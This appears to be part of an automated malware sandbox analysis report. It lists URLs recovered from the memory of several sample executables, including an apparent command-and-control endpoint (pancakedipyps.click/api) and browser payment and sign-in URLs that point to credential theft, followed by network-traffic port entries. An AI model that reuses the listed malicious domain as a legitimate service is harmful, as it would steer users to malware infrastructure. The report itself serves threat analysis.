                              Source: cd2469328d.exe, 0000000B.00000003.2770485636.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2685932804.0000000003537000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2686008403.000000000353B000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2792985078.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2792985078.0000000000D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api
                              Source: cd2469328d.exe, 0000000B.00000003.2660750223.000000000353F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apiShsw-
                              Source: cd2469328d.exe, 0000000B.00000003.2770485636.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2770600450.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2793080227.0000000000D8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apij
                              Source: cd2469328d.exe, 0000000B.00000003.2770485636.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2770600450.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2793080227.0000000000D8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/bu
                              Source: cd2469328d.exe, 0000000B.00000003.2770485636.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2770600450.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2793080227.0000000000D8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/pi
                              Source: cc6f25572f.exe, 00000011.00000003.2767490885.000001D66993D000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766984113.000001D66991A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766911611.000001D6698FC000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/
                              Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767120337.000001D669910000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766706272.000001D669904000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766455096.000001D66990B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
                              Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsCCAD43E
                              Source: cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsE89A621rro
                              Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/
                              Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767120337.000001D669910000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766706272.000001D669904000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766455096.000001D66990B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2874665665.000001D66991B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893696860.000001D66991C000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
                              Source: cc6f25572f.exe, 00000011.00000003.2874665665.000001D66991B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893696860.000001D66991C000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js.p
                              Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js;
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                              Source: cd2469328d.exe, 0000000B.00000003.2614023594.0000000003591000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691843677.0000000005E90000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3571306785.0000000006121000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3668818148.0000000005551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                              Source: 142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                              Source: 142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                              Source: cd2469328d.exe, 0000000B.00000003.2614023594.000000000358F000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2638485211.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2614149106.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2614417713.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2638302429.0000000003588000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2714805918.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2714653633.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2714471606.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691843677.0000000005E90000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691944256.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3616753929.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3571306785.0000000006121000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3572812328.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3618406974.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3616239893.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 35f0a75b93.exe, 0000002B.00000003.3799410374.0000000005BA0000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3668818148.000000000554F000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3691385905.0000000005505000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3691659491.0000000005505000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3669663163.0000000005505000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3669129539.0000000005505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                              Source: cd2469328d.exe, 0000000B.00000003.2614149106.0000000003563000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691944256.0000000005E64000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3572812328.00000000060F5000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3669129539.00000000054E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                              Source: cd2469328d.exe, 0000000B.00000003.2614023594.000000000358F000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2638485211.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2614149106.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2614417713.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2638302429.0000000003588000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2714805918.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2714653633.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2714471606.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691843677.0000000005E90000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691944256.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3616753929.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3571306785.0000000006121000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3572812328.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3618406974.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3616239893.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 35f0a75b93.exe, 0000002B.00000003.3799410374.0000000005BA0000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3668818148.000000000554F000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3691385905.0000000005505000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3691659491.0000000005505000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3669663163.0000000005505000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3669129539.0000000005505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                              Source: cd2469328d.exe, 0000000B.00000003.2614149106.0000000003563000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691944256.0000000005E64000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3572812328.00000000060F5000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3669129539.00000000054E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                              Source: cd2469328d.exe, 0000000B.00000002.2793903700.0000000003530000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2766963059.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800855972.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2802169090.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2635749379.000000000180C000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2636000487.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2635795252.00000000017BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2635749379.000000000180C000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2636000487.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2635795252.00000000017BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                              Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                              Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                              Source: cc6f25572f.exe, 00000010.00000003.2756924171.000002B0C1B4A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754299828.000002B0C1B19000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754614693.000002B0C1B36000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756665074.000002B0C1B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/c
                              Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767858563.000001D669944000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766754549.000001D669938000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767490885.000001D66993D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/earch
                              Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: cc6f25572f.exe, 00000010.00000003.2756451385.000002B0C1B21000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756608703.000002B0C1B27000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2755467748.000002B0C1B21000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756871989.000002B0C1B2E000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754299828.000002B0C1B19000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766754549.000001D669938000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/o
                              Source: cc6f25572f.exe, 00000010.00000003.2756144153.000002B0C1B04000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756744673.000002B0C1B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/om/
                              Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                              Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
                              Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767120337.000001D669910000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766706272.000001D669904000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766455096.000001D66990B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
                              Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly2p
                              Source: cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyF6033547
                              Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2874665665.000001D66991B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893696860.000001D66991C000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore2ure
                              Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
                              Source: cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767408832.000001D66991F000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766984113.000001D66991A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
                              Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox7Eult
                              Source: cc6f25572f.exe, 00000011.00000003.2767999680.000001D669920000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767408832.000001D66991F000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766984113.000001D66991A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxS
                              Source: 142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                              Source: 142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                              Source: cd2469328d.exe, 0000000B.00000003.2662924550.000000000365E000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2742956542.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3650480626.0000000006323000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                              Source: 142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                              Source: cd2469328d.exe, 0000000B.00000003.2662924550.000000000365E000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2742956542.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3650480626.0000000006323000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                              Source: cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F7000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                              Source: 2e4e1b8516.exe, 0000002D.00000003.3733054470.0000000001647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
